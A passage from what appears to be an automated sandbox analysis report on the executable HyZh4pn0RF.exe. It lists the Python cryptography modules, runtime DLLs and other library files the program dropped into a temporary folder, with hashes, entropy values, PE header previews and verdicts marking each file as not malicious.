SHA-512:	3580FB949ACEE709836C36688457908C43860E68A36D3410F3FA9E17C6A66C1CDD7C081102468E4E92E5F42A0A802470E8F4D376DAA4ED7126818538E0BD0BC4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.0..........P.....................................................`..........................................H.......I..d....p.......`..X...............,....C...............................A..@............@...............................text..../.......0.................. ..`.rdata.......@.......4..............@..@.data........P.......B..............@....pdata..X....`.......D..............@..@.rsrc........p.......H..............@..@.reloc..,............J..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA224.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.865452719694432
Encrypted:	false
SSDEEP:	384:y1jwGPJHLvzcY1EEerju9LcTZ6RO3RouLKtcyDNOcwgjxo:QjwyJUYToZwOLuzDNB1j
MD5:	C8FE3FF9C116DB211361FBB3EA092D33
SHA1:	180253462DD59C5132FBCCC8428DEA1980720D26
SHA-256:	25771E53CFECB5462C0D4F05F7CAE6A513A6843DB2D798D6937E39BA4B260765
SHA-512:	16826BF93C8FA33E0B5A2B088FB8852A2460E0A02D699922A39D8EB2A086E981B5ACA2B085F7A7DA21906017C81F4D196B425978A10F44402C5DB44B2BF4D00A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.8... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text....6.......8.................. ..`.rdata.......P.......<..............@..@.data........`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..,............T..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA256.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.867732744112887
Encrypted:	false
SSDEEP:	384:51jwGPJHLxzcY1EEerju9LcTZ6RO3RouLKtcyDNIegjxo:rjwyJOYToZwOLuzDNI7j
MD5:	A442EA85E6F9627501D947BE3C48A9DD
SHA1:	D2DEC6E1BE3B221E8D4910546AD84FE7C88A524D
SHA-256:	3DBCB4D0070BE355E0406E6B6C3E4CE58647F06E8650E1AB056E1D538B52B3D3
SHA-512:	850A00C7069FFDBA1EFE1324405DA747D7BD3BA5D4E724D08A2450B5A5F15A69A0D3EAF67CEF943F624D52A4E2159A9F7BDAEAFDC6C689EACEA9987414250F3B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.8... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text....6.......8.................. ..`.rdata.......P.......<..............@..@.data........`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..,............T..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA384.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27136
Entropy (8bit):	5.860044313282322
Encrypted:	false
SSDEEP:	384:xFDL3RqE3MjjQ95UnLa+1WT1aA7qHofg5JptfISH2mDDXfgjVx2:jDLh98jjRe+1WT1aAeIfMzxH2mDDIj
MD5:	59BA0E05BE85F48688316EE4936421EA
SHA1:	1198893F5916E42143C0B0F85872338E4BE2DA06
SHA-256:	C181F30332F87FEECBF930538E5BDBCA09089A2833E8A088C3B9F3304B864968
SHA-512:	D772042D35248D25DB70324476021FB4303EF8A0F61C66E7DED490735A1CC367C2A05D7A4B11A2A68D7C34427971F96FF7658D880E946C31C17008B769E3B12F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.J..."......P.....................................................`......................................... l.......m..d...............................,....e...............................d..@............`...............................text...hH.......J.................. ..`.rdata..X....`.......N..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..,............h..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA512.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27136
Entropy (8bit):	5.917025846093607
Encrypted:	false
SSDEEP:	384:tFYLXRqEnMgj969GUnLa+1WT1aA7qHofg5JptfIS320DXwElrgjhig:PYLB9Mgj0e+1WT1aAeIfMzx320DXD+j
MD5:	8194D160FB215498A59F850DC5C9964C
SHA1:	D255E8CCBCE663EE5CFD3E1C35548D93BFBBFCC0
SHA-256:	55DEFCD528207D4006D54B656FD4798977BD1AAE6103D4D082A11E0EB6900B08
SHA-512:	969EEAA754519A58C352C24841852CF0E66C8A1ADBA9A50F6F659DC48C3000627503DDFB7522DA2DA48C301E439892DE9188BF94EEAF1AE211742E48204C5E42
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.J..."......P.....................................................`..........................................l.......m..d...............................,...@f...............................e..@............`...............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..,............h..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_ghash_clmul.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12800
Entropy (8bit):	4.999870226643325
Encrypted:	false
SSDEEP:	192:DzFRF/1nb2mhQtk4axusjfkgZhoYDQgRjcqgQvEty:DzFd2f64axnTTz5D1gQvEty
MD5:	C89BECC2BECD40934FE78FCC0D74D941
SHA1:	D04680DF546E2D8A86F60F022544DB181F409C50
SHA-256:	E5B6E58D6DA8DB36B0673539F0C65C80B071A925D2246C42C54E9FCDD8CA08E3
SHA-512:	715B3F69933841BAADC1C30D616DB34E6959FD9257D65E31C39CD08C53AFA5653B0E87B41DCC3C5E73E57387A1E7E72C0A668578BD42D5561F4105055F02993C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...b..b..b..R...b..Uc..b.Rc..b..c..b..Ug..b..Uf..b..Ua..b..j..b..b..b....b..`..b.Rich.b.................PE..d....e.........." ...%............P.....................................................`..........................................8......89..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_ghash_portable.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.025153056783597
Encrypted:	false
SSDEEP:	192:AF/1nb2mhQtks0iiNqdF4mtPjD02A5APYcqgYvEL2x:62f6fFA/4GjDFcgYvEL2x
MD5:	C4CC05D3132FDFB05089F42364FC74D2
SHA1:	DA7A1AE5D93839577BBD25952A1672C831BC4F29
SHA-256:	8F3D92DE840ABB5A46015A8FF618FF411C73009CBAA448AC268A5C619CF84721
SHA-512:	C597C70B7AF8E77BEEEBF10C32B34C37F25C741991581D67CF22E0778F262E463C0F64AA37F92FBC4415FE675673F3F92544E109E5032E488F185F1CFBC839FE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8......h9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_keccak.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	5.235115741550938
Encrypted:	false
SSDEEP:	192:XTRgffnRaNfBj9xih1LPK73jm6AXiN4rSRIh42gDhgvrjcqgCieT3WQ:XafgNpj9cHW3jqXeBRamDOZgCieT
MD5:	1E201DF4B4C8A8CD9DA1514C6C21D1C4
SHA1:	3DC8A9C20313AF189A3FFA51A2EAA1599586E1B2
SHA-256:	A428372185B72C90BE61AC45224133C4AF6AE6682C590B9A3968A757C0ABD6B4
SHA-512:	19232771D4EE3011938BA2A52FA8C32E00402055038B5EDF3DDB4C8691FA7AE751A1DC16766D777A41981B7C27B14E9C1AD6EBDA7FFE1B390205D0110546EE29
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%."... ......P.....................................................`.........................................`I......TJ..d....p.......`..p...............,....C...............................B..@............@...............................text...(!.......".................. ..`.rdata.......@.......&..............@..@.data........P.......6..............@....pdata..p....`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_poly1305.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.133714807569085
Encrypted:	false
SSDEEP:	192:JZNGXEgvUh43G6coX2SSwmPL4V7wTdDlpaY2cqgWjvE:EVMhuGGF2L4STdDyYWgWjvE
MD5:	76C84B62982843367C5F5D41B550825F
SHA1:	B6DE9B9BD0E2C84398EA89365E9F6D744836E03A
SHA-256:	EBCD946F1C432F93F396498A05BF07CC77EE8A74CE9C1A283BF9E23CA8618A4C
SHA-512:	03F8BB1D0D63BF26D8A6FFF62E94B85FFB4EA1857EB216A4DEB71C806CDE107BA0F9CC7017E3779489C5CEF5F0838EDB1D70F710BCDEB629364FC288794E6AFE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%..... ......P.....................................................`......................................... 9.......9..d....`.......P..\|............p..,....3...............................1..@............0...............................text...X........................... ..`.rdata..(....0......."..............@..@.data........@.......2..............@....pdata..\|....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Math\_modexp.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	35840
Entropy (8bit):	5.928082706906375
Encrypted:	false
SSDEEP:	768:8bEkzS7+k9rMUb8cOe9rs9ja+V/Mhjh56GS:8bEP779rMtcOCs0I/Mhf
MD5:	B41160CF884B9E846B890E0645730834
SHA1:	A0F35613839A0F8F4A87506CD59200CCC3C09237
SHA-256:	48F296CCACE3878DE1148074510BD8D554A120CAFEF2D52C847E05EF7664FFC6
SHA-512:	F4D57351A627DD379D56C80DA035195292264F49DC94E597AA6638DF5F4CF69601F72CC64FC3C29C5CBE95D72326395C5C6F4938B7895C69A8D839654CFC8F26
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.\|.U./.U./.U./.-a/.U./....U./A-...U./.U./!U./....U./....U./....U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.^...0......`.....................................................`..........................................~..\|...\...d...............................,....s...............................q..@............p..(............................text...8].......^.................. ..`.rdata.......p.......b..............@..@.data................v..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Protocol\_scrypt.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.799063285091512
Encrypted:	false
SSDEEP:	192:nkCfXASTMeAk4OepIXcADp/X6RcqgO5vE:ZJMcPepIXcAD563gO5vE
MD5:	BA46602B59FCF8B01ABB135F1534D618
SHA1:	EFF5608E05639A17B08DCA5F9317E138BEF347B5
SHA-256:	B1BAB0E04AC60D1E7917621B03A8C72D1ED1F0251334E9FA12A8A1AC1F516529
SHA-512:	A5E2771623DA697D8EA2E3212FBDDE4E19B4A12982A689D42B351B244EFBA7EFA158E2ED1A2B5BC426A6F143E7DB810BA5542017AB09B5912B3ECC091F705C6E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K............RQ.....U.....R............U......U......U..................=..........Rich...................PE..d....e.........." ...%............P.....................................................`..........................................8..d...$9..d....`.......P..4............p..,....3...............................1..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ec_ws.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	754688
Entropy (8bit):	7.624959985050181
Encrypted:	false
SSDEEP:	12288:I1UrmZ9HoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h9:gYmzHoxJFf1p34hcrn5Go9yQO6L
MD5:	3F20627FDED2CF90E366B48EDF031178
SHA1:	00CED7CD274EFB217975457906625B1B1DA9EBDF
SHA-256:	E36242855879D71AC57FBD42BB4AE29C6D80B056F57B18CEE0B6B1C0E8D2CF57
SHA-512:	05DE7C74592B925BB6D37528FC59452C152E0DCFC1D390EA1C48C057403A419E5BE40330B2C5D5657FEA91E05F6B96470DDDF9D84FF05B9FD4192F73D460093C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&:..b[.Lb[.Lb[.Lk#sLd[.Lw$.M`[.L)#.Ma[.Lb[.LI[.Lw$.Mn[.Lw$.Mj[.Lw$.Ma[.LX..Mg[.LX..Mc[.LX..Lc[.LX..Mc[.LRichb[.L........................PE..d....e.........." ...%.n..........`.....................................................`..........................................p..d...tq..d...............0...............4...@Z...............................Y..@...............(............................text....l.......n.................. ..`.rdata...............r..............@..@.data................j..............@....pdata..0............r..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ed25519.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27648
Entropy (8bit):	5.792654050660321
Encrypted:	false
SSDEEP:	384:hBwi/rOF26VZW1n0n/Is42g9qhrnW0mvPauYhz35sWJftjb1Ddsia15gkbQ0e1:/L/g28Ufsxg9GmvPauYLxtX1D/kf
MD5:	290D936C1E0544B6EC98F031C8C2E9A3
SHA1:	CAEEA607F2D9352DD605B6A5B13A0C0CB1EA26EC
SHA-256:	8B00C859E36CBCE3EC19F18FA35E3A29B79DE54DA6030AAAD220AD766EDCDF0A
SHA-512:	F08B67B633D3A3F57F1183950390A35BF73B384855EAAB3AE895101FBC07BCC4990886F8DE657635AD528D6C861BC2793999857472A5307FFAA963AA6685D7E8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..........)......................................R......R......RE.....R.....Rich...........PE..d....e.........." ...%.F...(......P.....................................................`..........................................j..0....k..d...............................,...pc..............................0b..@............`...............................text...xD.......F.................. ..`.rdata.."....`.......J..............@..@.data................\..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..,............j..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ed448.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	67072
Entropy (8bit):	6.060461288575063
Encrypted:	false
SSDEEP:	1536:nqctkGACFI5t35q2JbL0UbkrwwOoKXyMH1B7M9rMdccdWxRLpq:nqctkGACFI5t35q2JbgrwwOoqLTM9rMh
MD5:	5782081B2A6F0A3C6B200869B89C7F7D
SHA1:	0D4E113FB52FE1923FE05CDF2AB9A4A9ABEFC42E
SHA-256:	E72E06C721DD617140EDEBADD866A91CF97F7215CBB732ECBEEA42C208931F49
SHA-512:	F7FD695E093EDE26FCFD0EE45ADB49D841538EB9DAAE5B0812F29F0C942FB13762E352C2255F5DB8911F10FA1B6749755B51AAE1C43D8DF06F1D10DE5E603706
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.\|.U./.U./.U./.-a/.U./....U./A-...U./.U./!U./....U./....U./....U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.....8......`........................................@............`.........................................`...h.......d.... .......................0..,.......................................@............................................text............................... ..`.rdata..*...........................@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..,....0......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_x25519.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.488437566846231
Encrypted:	false
SSDEEP:	96:tpVVdJvbrqTu6ZdpvY0IluLfcC75JiC4cs89EfqADwhDTAbcX6gn/7EC:5VddiT7pgTctdErDwDTicqgn/7
MD5:	289EBF8B1A4F3A12614CFA1399250D3A
SHA1:	66C05F77D814424B9509DD828111D93BC9FA9811
SHA-256:	79AC6F73C71CA8FDA442A42A116A34C62802F0F7E17729182899327971CFEB23
SHA-512:	4B95A210C9A4539332E2FB894D7DE4E1B34894876CCD06EEC5B0FC6F6E47DE75C0E298CF2F3B5832C9E028861A53B8C8E8A172A3BE3EC29A2C9E346642412138
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.h.r.h.r.h.{...p.h.g.i.p.h.9.i.q.h.r.i.V.h.g.m.y.h.g.l.z.h.g.k.q.h.H.`.s.h.H.h.s.h.H...s.h.H.j.s.h.Richr.h.........................PE..d....e.........." ...%............P........................................p............`..........................................'..P...0(..P....P.......@...............`..,...P#..............................."..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Util\_cpuid_c.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.730605326965181
Encrypted:	false
SSDEEP:	96:MJVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EVAElIijKDQGrbMZYJWJcX6gbW6s:CVddiT7pgTctEEaEDKDlMCWJcqgbW6
MD5:	4D9C33AE53B38A9494B6FBFA3491149E
SHA1:	1A069E277B7E90A3AB0DCDEE1FE244632C9C3BE4
SHA-256:	0828CAD4D742D97888D3DFCE59E82369317847651BBA0F166023CB8ACA790B2B
SHA-512:	BDFBF29198A0C7ED69204BF9E9B6174EBB9E3BEE297DD1EB8EB9EA6D7CAF1CC5E076F7B44893E58CCF3D0958F5E3BDEE12BD090714BEB5889836EE6F12F0F49E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`..........................................'..\|....'..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Util\_strxor.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.685843290341897
Encrypted:	false
SSDEEP:	96:6ZVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EMz3DHWMoG4BcX6gbW6O:IVddiT7pgTctEEO3DLoHcqgbW6
MD5:	8F4313755F65509357E281744941BD36
SHA1:	2AAF3F89E56EC6731B2A5FA40A2FE69B751EAFC0
SHA-256:	70D90DDF87A9608699BE6BBEDF89AD469632FD0ADC20A69DA07618596D443639
SHA-512:	FED2B1007E31D73F18605FB164FEE5B46034155AB5BB7FE9B255241CFA75FF0E39749200EB47A9AB1380D9F36F51AFBA45490979AB7D112F4D673A0C67899EF4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	119192
Entropy (8bit):	6.6016214745004635
Encrypted:	false
SSDEEP:	1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
MD5:	BE8DBE2DC77EBE7F88F910C61AEC691A
SHA1:	A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
SHA-256:	4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
SHA-512:	0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\VCRUNTIME140_1.dll

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49528
Entropy (8bit):	6.662491747506177
Encrypted:	false
SSDEEP:	768:wPIyGVrxmKqOnA4j3z6Su77A+i0QLxi9z9Rtii9zn+:fBr87uW1nA8QLx+zrti+zn+
MD5:	F8DFA78045620CF8A732E67D1B1EB53D
SHA1:	FF9A604D8C99405BFDBBF4295825D3FCBC792704
SHA-256:	A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
SHA-512:	BA7F8B7AB0DEB7A7113124C28092B543E216CA08D1CF158D9F40A326FB69F4A2511A41A59EA8482A10C9EC4EC8AC69B70DFE9CA65E525097D93B819D498DA371
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...\|!..{.&.\|!..{...\|!..Rich}!..................PE..d.....v..........." ...&.<...8.......B...................................................`A........................................Pm.......m..x....................r..xO......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\_asyncio.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	71448
Entropy (8bit):	6.247581706260346
Encrypted:	false
SSDEEP:	1536:rRaPPkDN3nkiP6djtX5IkTIL1yUvGJtIAOnT7SyqWx5:9anmN3nkikjV5IkTIL1yUuJtIAOnTgi
MD5:	209CBCB4E1A16AA39466A6119322343C
SHA1:	CDCCE6B64EBF11FECFF739CBC57E7A98D6620801
SHA-256:	F7069734D5174F54E89B88D717133BFF6A41B01E57F79957AB3F02DAA583F9E2
SHA-512:	5BBC4EDE01729E628260CF39DF5809624EAE795FD7D51A1ED770ED54663955674593A97B78F66DBF6AE268186273840806ED06D6F7877444D32FDCA031A9F0DA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z2.T.S...S...S...+r..S...,...S...,...S...,...S...,...S..$....S..U+...S...S...S..$....S..$....S..$....S..$....S..Rich.S..........PE..d......e.........." ...%.f................................................... ......')....`.............................................P......d......................../..............T...........................@...@............................................text...=d.......f.................. ..`.rdata..pO.......P...j..............@..@.data...(...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI3442\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	84760
Entropy (8bit):	6.5874715807724025
Encrypted:	false
SSDEEP:	1536:RS7z7Sj2u5in5IVfC83zYxzbdK87kW1IACVw7SyrxX:I7z+jum3MJdN7kW1IACVwX
MD5:	59D60A559C23202BEB622021AF29E8A9
SHA1:	A405F23916833F1B882F37BDBBA2DD799F93EA32
SHA-256:	706D4A0C26DD454538926CBB2FF6C64257C3D9BD48C956F7CABD6DEF36FFD13E
SHA-512:	2F60E79603CF456B2A14B8254CEC75CE8BE0A28D55A874D4FB23D92D63BBE781ED823AB0F4D13A23DC60C4DF505CBF1DBE1A0A2049B02E4BDEC8D374898002B1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
